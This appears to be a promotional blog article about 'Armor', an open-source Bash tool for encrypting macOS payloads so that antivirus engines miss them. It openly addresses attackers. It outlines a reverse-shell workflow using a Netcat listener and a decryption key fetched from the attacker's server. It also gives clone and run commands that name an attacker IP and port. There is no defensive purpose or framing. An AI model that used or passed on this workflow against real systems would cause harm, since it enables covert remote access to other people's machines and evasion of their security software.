Armor: A Powerful macOS Payload Encryption Tool

Cyber Security
1

Armor: A Powerful macOS Payload Encryption Tool

Introduction

In today’s cybersecurity landscape, bypassing anti-virus scanning tools has become a significant challenge. To address this issue, we introduce Armor, a powerful macOS Payload encryption tool created by Bash scripting. Armor enables the creation of encrypted payloads that can evade detection by anti-virus engines, making it an essential tool for any macOS attacker.

How Armor Works

Armor can be used in conjunction with Netcat to establish a TCP connection between the attacker’s system and the target macOS system. The process involves the following steps:

  1. Netcat Listener: The attacker sets up a Netcat listener on their system, listening on port 4444.
  2. Payload Execution: The attacker executes the Armor script on the target macOS system, which reads the contents of the “payload.txt” file. This file contains the encrypted Bash code.
  3. Decryption: The Armor script decrypts the Bash code using the decryption key hosted on the attacker’s server.
  4. Execution: The decrypted Bash code is executed on the target system, establishing a connection to the Netcat listener.
  5. Termination: Once the connection is established, the Netcat listener terminates.

Installation

To install Armor, you will need to have LibreSSL installed on your system. If you do not have LibreSSL installed, Armor will automatically help you install it. This feature can be found in the relevant code in the armor.sh file. Additionally, you will need to install Ncat, which can be done using the following command:

$ Apt-get update && apt-get install nmap

Cloning and Execution

To clone and execute the Armor tool, use the following commands:

git clone https://github.com/tokyoneon/Armor
cd Armor
chmod +x armor.sh
./armor.sh /path/to/payload.txt 1.2.3.4 443

In this command:

  • /path/to/payload.txt is the path to the encrypted payload file.
  • 1.2.3.4 is the IP address of the attacker’s server hosting the decryption key.
  • 443 is the server port number.

Project Address

The Armor project can be found on GitHub: https://github.com/tokyoneon/Armor